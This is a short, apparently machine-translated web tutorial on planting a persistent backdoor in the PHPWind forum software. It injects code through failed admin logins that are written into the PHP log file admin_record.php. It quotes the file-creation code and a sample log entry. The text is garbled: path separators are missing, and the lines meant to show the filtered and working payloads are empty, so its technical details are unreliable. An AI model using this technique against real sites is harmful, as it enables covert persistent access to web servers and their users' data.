Home > Article > Backend Development > Analysis of a backdoor method in pw_PHP tutorial
A way to put a backdoor in pw
databbscacheadmin_record.php records background login and operations. Let’s see how to operate this file:
adminadmincp.php:
$bbsrecordfile=D_P."data/bbscache/admin_record.php";
if(!file_exists($bbsrecordfile)){
writeover($bbsrecordfile,"n");
}//This if just says that if admin_record.php does not exist, use code to generate one
What if we just edit admin_record.php and delete :)
Let’s take a look at our code written into admin_record.php
You log in to http://localhost/PHPVind_GBK_6.0RC/upload/admin.php in the background
Use whatever you like Wrong user login will have the following record:
|admin|s|Logging Failed|127.0.0.1|1191667510|
Haha So we can write our code through this, but here It is filtered and cannot be used<
So our backdoor should be left like this: instead of